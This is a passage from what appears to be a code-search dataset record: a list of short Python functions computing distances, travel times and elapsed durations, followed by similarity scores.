Waypoint, second: Waypoint) -> int:\n return int(distance.vincenty(first.coords(), second.coords()).m)", "def get_distance_between(\n node1,\n node2,\n distance_between=False,\n bounding_box=False,\n rotate_pivot=False,\n):\n if distance_between:\n dist = cmds.createNode(\"distanceBetween\")\n cmds.connectAttr(node1 + \".worldMatrix[0]\", dist + \".inMatrix1\")\n cmds.connectAttr(node2 + 
\".worldMatrix[0]\", dist + \".inMatrix2\")\n value = cmds.getAttr(dist + \".distance\")\n cmds.delete(dist)\n return value\n\n if bounding_box:\n node1 = cmds.xform(\n node1, query=True, bounding_box=True, worldSpace=True\n )\n node2 = cmds.xform(\n node2, query=True, bounding_box=True, worldSpace=True\n )\n\n elif rotate_pivot:\n node1 = cmds.xform(\n node1, query=True, worldSpace=True, rotate_pivot=True\n )\n node2 = cmds.xform(\n node2, query=True, worldSpace=True, rotate_pivot=True\n )\n\n else:\n node1 = cmds.xform(\n node1, query=True, translation=True, worldSpace=True\n )\n node2 = cmds.xform(\n node2, query=True, translation=True, worldSpace=True\n )\n\n value = (\n (node1[0] - node2[0]) ** 2\n + (node1[1] - node2[1]) ** 2\n + (node1[2] - node2[2]) ** 2\n ) ** 0.5\n\n return value", "def get_time(cls):\n now = rospy.Time.now()\n return now.secs + now.nsecs*(10**-9) # time in seconds", "def compareNodes(x, y):\n return x.pathValue - y.pathValue", "def get_nodes_distance(dbpath,node1,node2,inst,stepname,nframe=-1):\n odb = openOdb(path=dbpath)\n _inst = odb.rootAssembly.instances[inst]\n ic = odb.rootAssembly.instances[inst].nodes\n us = odb.steps[stepname].frames[nframe].fieldOutputs['U'].getSubset(region=_inst).values\n xx1 = ic[node1-1].coordinates[0]+us[node1-1].data[0]\n yy1 = ic[node1-1].coordinates[1]+us[node1-1].data[1]\n xx2 = ic[node2-1].coordinates[0]+us[node2-1].data[0]\n yy2 = ic[node2-1].coordinates[1]+us[node2-1].data[1]\n if _inst.embeddedSpace == THREE_D:\n zz1 = ic[node1-1].coordinates[2]+us[node1-1].data[2]\n zz2 = ic[node2-1].coordinates[2]+us[node2-1].data[2]\n d = np.sqrt((xx2-xx1)**2 + (yy2-yy1)**2 + (zz2-zz1)**2)\n else:\n d = np.sqrt((xx2-xx1)**2+(yy2-yy1)**2)\n return d", "def get_length(self) -> np.float64:\n\n return np.float64(\n sqrt(\n (self.node1.x - self.node2.x) ** 2\n + (self.node1.y - self.node2.y) ** 2\n )\n )", "def inter_arrival_times(self):\n # this function returns arrival times between two subsequent tuples in ms\n # task mean_inter_arrival_time std_inter_arrival_time\n if self.inter_arrival_time is None:\n if self.tuple_arrival is None:\n self.tuple_arrivals()\n self.inter_arrival_time = convert_throughput_to_inter_arr_times(self.tuple_arrival)\n\n return self.inter_arrival_time", "def get_walk_to_target_duration(self):\n return self._walk_to_target_duration", "def getTime(self):\n return _osgAnimation.Motion_getTime(self)", "def print_train_time(start: float, end: float, device: torch.device = None):\n total_time = end - start\n print(f\"Train time on {device}: {total_time:.3f} seconds\")\n return total_time", "def rt_dep_time(self):\n return self._rt_dep_time", "def getWaypointTravelTime(self, waypoints, id_tm1, id_t):\n # Validate inputs\n if (not waypoints\n or len(waypoints) < 2\n or id_tm1 is None\n or id_t is None\n or id_tm1 < 0 or id_tm1 >= len(waypoints)\n or id_t < 0 or id_t >= len(waypoints)\n or self.speed_avg <= 0):\n # Invalid inputs\n return None\n\n waypoint_t = waypoints[id_t]\n waypoint_tm1 = waypoints[id_tm1]\n waypoint_dist = waypoint_tm1.distanceTo(waypoint_t)\n speed_avg_fps = knotsToFeetPerSecond(self.speed_avg)\n waypoint_travel_time = waypoint_dist / speed_avg_fps\n\n return waypoint_travel_time", "def getDeliveryTime(ori, dest):\n\n start_time = time.time()\n\n routingApi = herepy.RoutingApi(os.getenv(\"HERE_KEY\"))\n gm = GoogleMaps(os.getenv(\"GOOGLE_KEY\"))\n\n try:\n response = routingApi.truck_route(ori.coords[::-1], dest.coords[::-1], [herepy.RouteMode.truck, herepy.RouteMode.fastest]).as_dict()\n distance = 
response.get('response').get('route')[0].get('summary').get('distance') / 1000\n except herepy.error.HEREError:\n try:\n response = gm.distance_matrix(ori.coords[::-1], dest.coords[::-1], mode=\"driving\", departure_time=dt.datetime.now(), traffic_model=\"pessimistic\")\n distance = response.get('rows')[0].get('elements')[0].get('distance').get('value') / 1000\n except Exception as e:\n capture_exception(e)\n raise e\n\n if distance < 51:\n deltime = 6\n elif distance > 50 and distance < 701:\n deltime = 24\n elif distance > 700 and distance < 1400:\n deltime = 48\n else:\n deltime = 72\n\n print('--- Tiempo de ejecucion calcDeliveryTime: {} segundos ---'.format((time.time() - start_time)))\n\n return deltime, distance", "def get_time(network, road_id):\n return network[0][road_id][4]", "def route_info_helper(g, origin, destination, distance):\n time = 0 \n acceleration = 1406.25\n \n if(distance > 400):\n time = time + 0.53 + 0.53\n distance = distance - 400\n time = time + distance / 750\n else:\n half = distance / 2.0\n time = time + 2 (math.sqrt((2 * half) / acceleration))\n \n \n flights_out = g.city_dict[destination].get_flights_out()\n number = len(flights_out)\n time = time + (2.1 - (0.1 * number))\n \n return time", "def duration(self):\r\n return (self.end_time or time.time()) - self.start_time", "def get_coverage_time(self):\n res1 = self.get_attr('time_coverage_start')\n res2 = self.get_attr('time_coverage_end')\n return (res1, res2)", "def get_time(self) -> float:\n return self.player.time", "def trame_distance(t1, t2):\n return np.linalg.norm(t1 - t2)", "def getTravelTimes(self): \n nrec = self.nrec\n nsrc = self.nsrc\n if (nrec < 1): \n print(\"No receiver locations set\")\n return None\n if (nsrc < 1):\n print(\"No sources\")\n ttr = ascontiguousarray(zeros(nrec*nsrc), dtype='float64')\n ttrPointer = ttr.ctypes.data_as(POINTER(c_double))\n ierr = c_int(1)\n self.fteik2d.fteik_solver2d_getTravelTimes64f(nrec, ttrPointer, ierr)\n if (ierr.value != 0): \n print(\"Error getting travel times\")\n return None\n if (nsrc > 1):\n ttr = reshape(ttr, [self.nrec, self.nsrc], order='F')\n return ttr", "def dist(gene1, gene2):\n return abs(len(gene1.goal) - len(gene2.goal))", "def duration(self) -> float:\n return time.time() - self.connect_time", "def dep_time(self):\n return self._dep_time", "def runtime(self):\n return self.stop_time - self.start_time", "def get_time_elapsed(self):\n return self.__time_elapsed", "def distanceTwoPoints(self, A, B):\r\n # productive\r\n # used by addNeedleToScene\r\n if frequent: profprint()\r\n length = ((A[0] - B[0]) ** 2 + (A[1] - B[1]) ** 2 + (A[2] - B[2]) ** 2) ** 0.5\r\n return length", "def elapsed(self):\n return datetime.datetime.now() - self.start", "def getTime(self):\n return self.step / (self.max_step + int(self.include))", "def get_elapsed_time(self):\n\n return datetime.timedelta(seconds=int(time.time() - self.start_time))", "def get_distance(start, end):\n\n\t\tloc_start, loc_end, dst_node = create_distance(start, end)\n\t\tdistance = cmds.getAttr(\"%s.distance\" % dst_node)\n\n\t\tcmds.delete([loc_start, loc_end, dst_node])\n\n\t\treturn distance", "def runtime(self):\n return (self.time - self.start).total_seconds()", "def part_two():\n tasks = {}\n current_time = 0\n while G.nodes():\n # noinspection PyCallingNonCallable\n candidate_next_tasks = [task for task in G.nodes()\n if task not in tasks.keys() and G.in_degree(task) == 0]\n if candidate_next_tasks and len(tasks) < 5:\n next_task = sorted(candidate_next_tasks)[0]\n 
tasks[next_task] = ord(next_task) - 4\n else:\n min_task_time = min(tasks.values())\n current_time += min_task_time\n completed_task = dict(zip(tasks.values(), tasks.keys()))[min_task_time]\n tasks = {k: v - min_task_time for k, v in tasks.items() if k != completed_task}\n G.remove_node(completed_task)\n return current_time", "def current_time(cls) -> float:", "def GetTimeAndDurationOfTripSinceDeparture(PathInfo):\r\n\tif not PathInfo:\r\n\t\treturn None \r\n\tif len(PathInfo) < 2: return None \r\n\r\n\tdeparture_first_station = PathInfo[1][ConnInfoInd['departure_hour']]*60 + PathInfo[1][ConnInfoInd['departure_min']]\r\n\r\n\tarrival_last_station = PathInfo[-1][ConnInfoInd['arrival_hour']]*60 + PathInfo[-1][ConnInfoInd['arrival_min']]\r\n\tTotalDuration = arrival_last_station - departure_first_station\r\n\treturn (TotalDuration, departure_first_station, arrival_last_station)", "def road_travel(self, path, vehicle_type):\n # last node in path\n # is destination\n if len(path) < 2:\n return\n\n leg = path[0]\n if vehicle_type is VehicleType.Public:\n edge = self.transit_roads.network[leg.frm][leg.to][leg.edge_no]\n else:\n edge = self.roads.network[leg.frm][leg.to][leg.edge_no]\n\n # where leg.p is the proportion of the edge we travel\n time = self.roads.router.edge_travel_time(edge) * leg.p\n\n return leg, edge, time", "def queued_time(self):\r\n return (self.node_monitor_launch_time - self.node_monitor_submit_time)", "def print_train_time(start, end, device=None):\n total_time = end - start\n print(f\"\\nTrain time on {device}: {total_time:.3f} seconds\")\n return total_time", "def distance( self, source, target ):\n return nx.shortest_path_length(self._G, source, target)", "def elapsed_time(self):\n return self.__elapsed_time", "def time(self) -> int:\n return self.__droneTime", "def lineLength(node1, node2):\n return ((node2[1] - node1[1])**2 + (node2[0] - node1[0])**2)**(1/2)", "def tunnel2_bgp_holdtime(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"tunnel2_bgp_holdtime\")", "def duration(self):\n return self.end_time - self.start_time", "def time(self):\n raise \"use method time of class ReactorNet\"\n #return _cantera.reactor_time(self.__reactor_id)", "def getDistanceBetweenTwoPoints(self, one, two):\n dx = one.x - two.x\n dy = one.y - two.y\n return math.sqrt(dx * dx + dy * dy)", "def dist(v1, v2):\n return ( (v1[0] - v2[0])**2 + (v1[1] - v2[1])**2 )**0.5" ]
[ "0.69388837", "0.6491376", "0.64647245", "0.644064", "0.64244837", "0.64106727", "0.64093053", "0.6311803", "0.6295542", "0.61754763", "0.6144564", "0.613612", "0.61312324", "0.5971906", "0.59415174", "0.5910606", "0.5904154", "0.5904154", "0.59017485", "0.58911026", "0.5867693", "0.58613896", "0.5855374", "0.58447486", "0.5828466", "0.58070576", "0.57984656", "0.5795412", "0.5771729", "0.5765164", "0.56907415", "0.5670746", "0.56682986", "0.56636024", "0.562321", "0.5611932", "0.56091034", "0.5601874", "0.5598441", "0.5597963", "0.5592729", "0.557365", "0.5567834", "0.554714", "0.55455947", "0.5544582", "0.554291", "0.55402213", "0.55398345", "0.5538411", "0.5511942", "0.55040485", "0.5496998", "0.5485866", "0.5485846", "0.548223", "0.54793936", "0.5479138", "0.54778624", "0.5473173", "0.5468491", "0.54655224", "0.54590774", "0.54581517", "0.5455923", "0.54480493", "0.5447103", "0.54462856", "0.5441164", "0.5435649", "0.54320824", "0.543087", "0.54254633", "0.5420291", "0.5413558", "0.5412594", "0.5411067", "0.54068005", "0.54064447", "0.5404104", "0.53981924", "0.53943276", "0.53916657", "0.53812635", "0.5365424", "0.53653497", "0.53621364", "0.53595394", "0.53503644", "0.5345062", "0.53420836", "0.5334154", "0.5333674", "0.53323317", "0.5329427", "0.5329157", "0.5325875", "0.53218323", "0.53217274", "0.5318948", "0.5315421" ]
0.0
-1
Variable assignment can include assigning array elements.
def assign_variable(executor, variable, value):
    variable = variable.replace(" ", "")
    # TODO Should move parsing of this to ParsedStatementLet.
    # TODO Need to handle N-dimensional array element assignment.
    i = variable.find("(")
    if i != -1:
        # Array reference
        j = variable.find(")", i+1)
        if j == -1:
            raise BasicSyntaxError(F"Missing ) in array assignment to {variable}")
        if i+1 == j:
            raise BasicSyntaxError(F"Missing array subscript in assignment to {variable}")
        subscripts = variable[i+1:j].split(",")
        variable = variable[:i]
        is_valid_identifier(variable)
        subscripts = [int(eval_expression(executor._symbols, subscript)) - 1 for subscript in subscripts]
        executor.put_symbol_element(variable, value, subscripts)
    else:
        is_valid_identifier(variable)
        executor.put_symbol(variable, value, symbol_type=SymbolType.VARIABLE, arg=None)
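A minimal, self-contained sketch of the same array-element parsing, with a plain dict standing in for the executor's symbol table; the 10x10 array A, the assign() helper name, and int() in place of eval_expression are illustrative assumptions:

# Hypothetical 10x10 BASIC-style array; the real code goes through the executor.
arrays = {"A": [[0] * 10 for _ in range(10)]}

def assign(target, value):
    target = target.replace(" ", "")
    i = target.find("(")
    if i == -1:
        raise ValueError("scalar assignment omitted from this sketch")
    j = target.find(")", i + 1)
    if j == -1 or i + 1 == j:
        raise SyntaxError(f"Bad subscript in assignment to {target}")
    name = target[:i]
    # BASIC subscripts are 1-based; shift each to a 0-based Python index.
    subscripts = [int(s) - 1 for s in target[i + 1:j].split(",")]
    elem = arrays[name]
    for sub in subscripts[:-1]:
        elem = elem[sub]
    elem[subscripts[-1]] = value

assign("A(2, 3)", 42)
print(arrays["A"][1][2])  # -> 42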
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_50_assign_statement(self):\n\t\tinput = \"\"\"var x,y:integer;\n\t\tfunction f(): array[1 .. 3] of real;\n\t\tvar a: array[1 .. 3] of real;\n\t\tbegin a[2]:=1.1; return a; end\n\t\tprocedure main(); var x:array[1 .. 2]of real;\n\t\tbegin f()[1]:=x[1]:=1; with y:real;y:real; do begin end end\"\"\"\n\t\texpect = \"Redeclared Variable: y\"\n\t\tself.assertTrue(TestChecker.test(input,expect,450))", "def test_47_assign_statement(self):\n\t\tinput = \"\"\"var x,y:integer;\n\t\tfunction f(): array[1 .. 3] of real;\n\t\tvar a: array[1 .. 3] of real;\n\t\tbegin a[2]:=1.1; return a; end\n\t\tprocedure main(); var x:array[1 .. 3]of real;\n\t\tbegin f()[1]:=x[1]:=1; with y:real;y:real; do begin end end\"\"\"\n\t\texpect = \"Redeclared Variable: y\"\n\t\tself.assertTrue(TestChecker.test(input,expect,447))", "def test_46_assign_statement(self):\n\t\tinput = \"\"\"var x,y:integer;\n\t\tprocedure main(); var x:array[1 .. 3]of real; begin x[1]:=1;\n\t\twith y:integer;y:real; do begin end end\"\"\"\n\t\texpect = \"Redeclared Variable: y\"\n\t\tself.assertTrue(TestChecker.test(input,expect,446))", "def test_48_assign_statement(self):\n\t\tinput = \"\"\"var x,y:integer;\n\t\tfunction f(): array[1 .. 3] of real;\n\t\tvar a: array[1 .. 2] of real;\n\t\tbegin a[2]:=1.1; return a; end\n\t\tprocedure main(); var x:array[1 .. 3]of real;\n\t\tbegin f()[1]:=x[1]:=1; end\"\"\"\n\t\texpect = \"Type Mismatch In Statement: Return(Some(Id(a)))\"\n\t\tself.assertTrue(TestChecker.test(input,expect,448))", "def test_49_assign_statement(self):\n\t\tinput = \"\"\"var x,y:integer;\n\t\tfunction f(): array[1 .. 2] of real;\n\t\tvar a: array[1 .. 3] of real;\n\t\tbegin a[2]:=1.1; return a; end\n\t\tprocedure main(); var x:array[1 .. 3]of real;\n\t\tbegin f()[1]:=x[1]:=1; end\"\"\"\n\t\texpect = \"Type Mismatch In Statement: Return(Some(Id(a)))\"\n\t\tself.assertTrue(TestChecker.test(input,expect,449))", "def _AugAssign(self, t):\n if not isinstance(t.target, ast.Name):\n self.RaiseError(t, \"Augmented assignment to complex expressions not supported\")\n # check if target exists in locals\n if t.target.id not in self._locals :\n self.RaiseError(t, \"Augmented assignment not permitted on variables not already assigned previously\")\n self.fill()\n self.dispatch(t.target)\n self.write(\" \"+self.binop[t.op.__class__.__name__]+\"= \")\n self.dispatch(t.value)\n self.write(\";\")", "def visit_Assign(self, node):\n self.generic_visit(node)\n target = get_single_target(node)\n if isinstance(target, ast.Subscript):\n fun = to_attribute(self.operator, 'setitem')\n args = [target.value, self.index_to_expr(target.slice), node.value]\n return ast.Expr(to_call(fun, args))\n return node", "def visit_VarAssignNode(self, node: VarAssignNode, symbol_table: SymbolTable) -> None:\n if isinstance(node.name, AccessNode) and isinstance(node.name.item_to_access, NumberNode):\n var = self.visit(node.name.accessor, symbol_table)\n var.vals[int(node.name.item_to_access.tok.value)] = self.visit(node.value, symbol_table)\n if isinstance(var, List):\n var.value = [item[idx].value for idx, item in enumerate(var.vals.values())]\n else:\n return f'Strings are immutable'\n else:\n assignment = self.visit(node.value, symbol_table)\n\n symbol_table[node.name] = assignment", "def visit_assign(self: Parser, node: doc.Assign) -> None:\n if len(node.targets) != 1:\n self.report_error(node, \"Consequential assignments like 'a = b = c' are not supported.\")\n lhs = node.targets[0]\n\n if isinstance(node.value, doc.Subscript):\n check_slices = []\n if 
isinstance(node.value.slice, doc.Slice):\n check_slices = [node.value.slice]\n elif isinstance(node.value.slice, doc.Tuple):\n for p in node.value.slice.elts:\n if isinstance(p, doc.Slice):\n check_slices.append(p)\n for s in check_slices:\n if not s.step and s.upper and s.lower:\n s.step = doc.Constant(\n 1,\n None,\n 1,\n 1,\n s.upper.lineno,\n s.upper.end_col_offset + 1,\n s.upper.lineno,\n s.upper.end_col_offset + 2,\n )\n\n rhs = self.eval_expr(node.value)\n if isinstance(lhs, doc.Subscript):\n if isinstance(lhs.slice, doc.Tuple):\n indices = []\n for index in lhs.slice.elts:\n indices.append(self.eval_expr(index))\n else:\n indices = self.eval_expr(lhs.slice)\n T.buffer_store(self.eval_expr(lhs.value), rhs, indices)\n else:\n self.eval_assign(target=lhs, source=rhs, bind_value=bind_assign_value)", "def assign(array1, array2):\n for i in range(len(array1)):\n array2[i] = array1[i]", "def _Assign(self, t):\n if len(t.targets) > 1:\n self.RaiseError(t, \"Assignment to multiple targets not supported\")\n if not isinstance(t.targets[0], ast.Name):\n self.RaiseError(t, \"Assignment to complex expressions not supported\")\n self.fill()\n # check if target exists in locals\n if t.targets[0].id not in self._locals :\n self.write(\"auto \")\n self._locals.append(t.targets[0].id)\n self.dispatch(t.targets[0])\n self.write(\" = \")\n self.dispatch(t.value)\n self.write(\";\")", "def visit_Assign(self, node):\n var_name = node.left.value\n self.VARIABLES[var_name] = self.visit(node.right)", "def eval_assignment(exp, env):\n set_variable_value(assignment_variable(exp), m_eval(assignment_value(exp), env), env)\n return quote(\"ok\")", "def checkVarArray(self, script, node):\n\n if isinstance(node.value, ast.Call):\n if isinstance(node.value.func, ast.Name):\n if node.value.func.id == 'Var':\n if len(node.value.args) > 0:\n for target in node.targets:\n if isinstance(target, ast.Attribute):\n if isinstance(target.value, ast.Name):\n if target.value.id in script.modelVars:\n if target.value.id not in self.varArrays:\n self.varArrays[target.value.id] = []\n self.varArrays[target.value.id].append(target.attr)", "def set_assignment(self, var, value):\n self.variable_to_value[var] = value", "def _assign_op(dest, op, arg, val, path, scope):\n if op == '[':\n dest[arg] = val\n elif op == '.':\n setattr(dest, arg, val)\n elif op == 'P':\n _assign = scope[TargetRegistry].get_handler('assign', dest)\n try:\n _assign(dest, arg, val)\n except Exception as e:\n raise PathAssignError(e, path, arg)\n else: # pragma: no cover\n raise ValueError('unsupported T operation for assignment')", "def varcopy(self, vars):", "def assign_variable(self, name, value):\n return self.set_variable(name, value)", "def _var_update(self, **kwargs):\n for k, v in kwargs.items():\n if v is not None:\n v = np.asanyarray(v)\n\n if not hasattr(self, k):\n setattr(self, k, v)\n elif v is not None:\n setattr(self, k, v)\n \n self._var_check()", "def assign(ary, out):\n\n from . 
import _bh\n\n if not np.isscalar(ary):\n (ary, out) = broadcast_arrays(ary, out)[0]\n # We ignore self assignments\n if _bh.same_view(ary, out):\n return\n\n # Assigning empty arrays doesn't do anything\n if hasattr(ary, \"size\"):\n if ary.size == 0:\n return\n if hasattr(out, \"size\"):\n if out.size == 0:\n return\n\n # We use a tmp array if the in-/out-put has memory conflicts\n if overlap_conflict(out, ary):\n tmp = array_create.empty_like(out)\n assign(ary, tmp)\n return assign(tmp, out)\n\n if bhary.check(out):\n _bh.ufunc(UFUNCS[\"identity\"].info['id'], (out, ary))\n else:\n if bhary.check(ary):\n if \"BH_SYNC_WARN\" in os.environ:\n import warnings\n warnings.warn(\"BH_SYNC_WARN: Copying the array to NumPy\", RuntimeWarning, stacklevel=2)\n ary = ary.copy2numpy()\n out[...] = ary", "def assign(self, *args):\n return _ida_hexrays.cloop_t_assign(self, *args)", "def visit_AugAssign(self, node):\n target = node.target\n\n rhs_target = copy.deepcopy(target)\n rhs_target.ctx = ast.Load()\n ast.fix_missing_locations(rhs_target)\n\n bin_op = ast.BinOp(rhs_target, node.op, node.value)\n assignment = ast.Assign([target], bin_op)\n assignment.inplace_op = node.op\n return self.visit(assignment)", "def irgen_assign(stmt, builder, table):\n lvalue = irgen_lvalue(stmt.exprs[0], builder, table)\n expr = irgen_expr(stmt.exprs[1], builder, table)\n builder.store(expr, lvalue)", "def __call__(self, elementname, name, master):\n self._name = name\n self._master = master\n if elementname not in self._elementvars:\n v = ArrayElementVar(varname=self._name, elementname=elementname, master=self._master)\n self._elementvars[elementname] = v\n return self._elementvars[elementname]", "def assign(self, V, py):\n V.value = py", "def assign(self, V, py):\n V.value = py", "def assign(self, V, py):\n V.value = py", "def assign(self, V, py):\n V.value = py", "def assign(self, assignee: np.ndarray):\n if isinstance(self.data, pd.DataFrame):\n self.data = pd.concat([self.data, assignee], axis=1, ignore_index=True)\n else:\n self.data = pd.DataFrame(data=assignee)", "def setUniformValueArray(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\n pass", "def visit_AugAssign(self, node):\n self.generic_visit(node)\n stmts = []\n target = node.target\n if not isinstance(target, ast.Subscript):\n return node\n\n # AST node for target value, gensym-ed if necessary.\n if self.can_reevaluate(target.value):\n target_node = target.value\n else:\n target_node = to_name(gensym())\n stmts.append(ast.Assign(\n [set_ctx(target_node, ast.Store())], target.value))\n \n # AST node for index, gensym-ed if necessary.\n index_expr = self.index_to_expr(target.slice)\n if self.can_reevaluate(index_expr):\n index_node = index_expr\n else:\n index_node = to_name(gensym())\n stmts.append(ast.Assign(\n [set_ctx(index_node, ast.Store())], index_expr))\n \n # Main AST node for the indexed augemented assignment.\n stmts.append(ast.Expr(\n to_call(to_attribute(self.operator, 'setitem'), [\n target_node,\n index_node,\n to_call(self.op_to_function(node.op), [\n to_call(to_attribute(self.operator, 'getitem'), [\n target_node,\n index_node,\n ]),\n node.value\n ])\n ])\n ))\n\n return stmts", "def multiple_value_call_assignment_handler(target, value, assign_stmts, node, id_str):\n #print(\"multiple_value_call_assignment_handler\")\n target_stmts, value_var = stypy_functions.create_temp_Assign(value, node.lineno, node.col_offset,\n \"{0}_assignment\".format(id_str))\n assign_stmts.append(target_stmts)\n\n 
#value_var_to_load = copy.deepcopy(value_var)\n value_var_to_load = ast.Name()\n value_var_to_load.col_offset = value_var.col_offset\n value_var_to_load.lineno = value_var.lineno\n value_var_to_load.id = value_var.id\n value_var_to_load.ctx = ast.Load()\n\n for i in xrange(len(target.elts)):\n # Assign values to each element.\n # getitem_att = core_language.create_attribute(value_var_to_load, '__getitem__', context=ast.Load(),\n # line=node.lineno,\n # column=node.col_offset)\n # item_call = functions.create_call(getitem_att, [core_language.create_num(i, node.lineno, node.col_offset)])\n # temp_stmts, temp_value = stypy_functions.create_temp_Assign(item_call, node.lineno, node.col_offset,\n # \"{0}_assignment\".format(id_str))\n stypy_interface = core_language.create_Name('stypy_interface')\n get_tuple_call = core_language.create_attribute(stypy_interface, 'stypy_get_value_from_tuple', context=ast.Load(),\n line=node.lineno,\n column=node.col_offset)\n\n item_call = functions.create_call(get_tuple_call, [value_var_to_load,\n core_language.create_num(len(target.elts), node.lineno, node.col_offset),\n core_language.create_num(i, node.lineno, node.col_offset)])\n temp_stmts, temp_value = stypy_functions.create_temp_Assign(item_call, node.lineno, node.col_offset,\n \"{0}_assignment\".format(id_str))\n if hasattr(node, 'lineno'):\n temp_stmts.lineno = node.lineno\n temp_stmts.col_offset = node.col_offset\n\n assign_stmts.append(temp_stmts)\n\n temp_stmts = core_language.create_Assign(target.elts[i], temp_value)\n if hasattr(node, 'lineno'):\n temp_stmts.lineno = node.lineno\n temp_stmts.col_offset = node.col_offset\n\n assign_stmts.append(temp_stmts)\n\n return True", "def visit_simple_assign(self, node):\n temp = gensym()\n temp_target = to_name(temp, ast.Store())\n stmts = [ ast.Assign([temp_target], node.value) ]\n stmts += [ ast.Assign([target], to_name(temp))\n for target in node.targets ]\n return stmts", "def visit_Assign(self, node):\n self.generic_visit(node)\n is_multiple = len(node.targets) > 1\n is_compound = any(map(is_sequence_node, node.targets))\n is_simple = not is_compound\n if is_simple and is_multiple:\n return self.visit_simple_assign(node)\n elif is_compound and (is_multiple or is_sequence_node(node.value)):\n return self.visit_compound_assign(node)\n return node", "def assign(self, *args):\n return _ida_hexrays.cexpr_t_assign(self, *args)", "def visit_compound_assign(self, node):\n # Determine number of values (arity) of compound assignment.\n nvalues = { len(target.elts) for target in node.targets \n if is_sequence_node(target) }\n if len(nvalues) > 1:\n # A multiple, compound assignment with different arities, e.g.,\n # `x,y = a,b,c = ...` is not a syntax error in Python, though it\n # probably should be because it's guaranteed to cause a runtime\n # error. 
Raise the error here, since we cannot proceed.\n raise SyntaxError(\"Multiple assignment with different arities\")\n nvalues = nvalues.pop()\n\n # Assign temporary variables.\n temps = [ gensym() for i in range(nvalues) ]\n stmts = []\n if is_sequence_node(node.value) and len(node.value.elts) == nvalues:\n # Special case: RHS is sequence literal of correct length.\n for i in range(nvalues):\n temp_target = to_name(temps[i], ast.Store())\n stmts.append(ast.Assign([temp_target], node.value.elts[i]))\n else:\n # General case.\n temp_target = to_tuple(\n (to_name(temp, ast.Store()) for temp in temps), ast.Store())\n stmts.append(ast.Assign([temp_target], node.value))\n\n # Rewrite assignments as sequence of assignments.\n for target in reversed(node.targets):\n if is_sequence_node(target):\n stmts.extend(ast.Assign([target.elts[i]], to_name(temps[i]))\n for i in range(nvalues))\n else:\n temp_tuple = to_tuple(to_name(temp) for temp in temps)\n stmts.append(ast.Assign([target], temp_tuple))\n \n return stmts", "def assign_operator(cls, quad):\n\t\tvalue = cls.get_address_value(quad.left_operand)\n\t\tif quad.right_operand :\n\t\t\tcls.set_arr_value(quad.result, quad.right_operand, value)\n\t\telse:\n\t\t\tcls.set_address_value(quad.result, value)", "def variable(self, val):", "def variabilize(self):\n if self.nvars>=0:\n pass #already done\n else:\n varTab = syt.SymbolTable()\n def convertArgs(args):\n return map(lambda a: -varTab.getId(a) if isVariableAtom(a) else a, args)\n def convertGoal(g):\n return Goal(g.functor, convertArgs(g.args))\n if self.lhs: self.lhs = convertGoal(self.lhs)\n self.rhs = map(convertGoal, self.rhs)\n if self.features:\n self.features = map(convertGoal, self.features)\n if self.findall:\n self.findall = map(convertGoal, self.findall) \n self.variableList = varTab.getSymbolList()\n self.nvars = len(self.variableList)", "def setVariable(self, *args):\n return _libsbml.EventAssignment_setVariable(self, *args)", "def __setitem__(self, idx, value):\n if not isinstance(value, nodes.Node):\n raise NotImplementedError(\"setitem with non-blaze rhs\")\n result = self.getitem(idx, context='set')\n result = Assign('assign', [result, value])\n result.eval()", "def bind_assign_value(self: Parser, node: doc.expr, var_name: str, value: Any) -> Any:\n if isinstance(value, T.meta_var):\n return value.value\n elif isinstance(value, (list, tuple)):\n for i, v in enumerate(value):\n bind_assign_value(self, node, f\"{var_name}_{i}\", v)\n return value\n elif isinstance(value, Frame):\n value.add_callback(partial(value.__exit__, None, None, None))\n res = value.__enter__()\n IRBuilder.name(var_name, res)\n return res\n elif isinstance(value, (Buffer, IterVar)) or (\n isinstance(value, Var) and not self.var_table.exist(value)\n ):\n IRBuilder.name(var_name, value)\n return value\n else:\n value = tvm.runtime.convert(value)\n frame = T.LetStmt(value)\n var = frame.var\n IRBuilder.name(var_name, var)\n frame.add_callback(partial(frame.__exit__, None, None, None))\n frame.__enter__()\n return var", "def visit_aug_assign(self: Parser, node: doc.AugAssign) -> None:\n lhs_pos = (\n node.target.lineno,\n node.target.col_offset,\n node.target.end_lineno,\n node.target.end_col_offset,\n )\n rhs_pos = (\n node.value.lineno,\n node.value.col_offset,\n node.value.end_lineno,\n node.value.end_col_offset,\n )\n node.target.ctx = doc.Load(*lhs_pos)\n with self.var_table.with_frame():\n lhs_name = \"__tvm_tmp_value_aug_assign_lhs\"\n rhs_name = \"__tvm_tmp_value_aug_assign_rhs\"\n lhs_expr = 
self.eval_expr(node.target)\n rhs_expr = self.eval_expr(node.value)\n self.var_table.add(lhs_name, lhs_expr)\n self.var_table.add(rhs_name, rhs_expr)\n op = doc.BinOp(\n doc.Name(lhs_name, doc.Load(*lhs_pos), *lhs_pos),\n node.op,\n doc.Name(rhs_name, doc.Load(*rhs_pos), *rhs_pos),\n *lhs_pos,\n )\n rhs = self.eval_expr(op)\n lhs = node.target\n lhs.ctx = doc.Store(*lhs_pos)\n if isinstance(lhs, doc.Subscript):\n if isinstance(lhs.slice, doc.Tuple):\n indices = []\n for index in lhs.slice.elts:\n indices.append(self.eval_expr(index))\n else:\n indices = [self.eval_expr(lhs.slice)]\n T.buffer_store(self.eval_expr(lhs.value), rhs, indices)\n else:\n self.eval_assign(target=lhs, source=rhs, bind_value=bind_assign_value)", "def visit_ann_assign(self: Parser, node: doc.AnnAssign) -> None:\n lhs = node.target\n rhs = self.eval_expr(node.value)\n ann_var = self.visit_tvm_annotation(node.annotation)\n if not isinstance(ann_var, Var):\n self.report_error(node.annotation, \"Annotation should be Var\")\n self.eval_assign(target=lhs, source=ann_var, bind_value=bind_assign_value)\n frame = T.LetStmt(rhs, var=ann_var)\n frame.add_callback(partial(frame.__exit__, None, None, None))\n frame.__enter__()", "def visit_AugAssign(self, node):\n # FIXME: Gensym the LHS to avoid two evaluations.\n self.generic_visit(node)\n rhs = to_call(self.op_to_function(node.op),\n [set_ctx(node.target), node.value])\n return ast.Assign([node.target], rhs)", "def visit_Assign(self, node):\n self.generic_visit(node)\n\n if node.col_offset == 0:\n mnode = ast.parse(\"\")\n mnode.body = [node]\n mnode = ast.fix_missing_locations(mnode)\n code = compile(mnode, \"<ast>\", \"exec\")\n try:\n exec(code, self.globals_)\n except Exception:\n pass\n self.globals_.pop(\"__builtins__\", None)\n 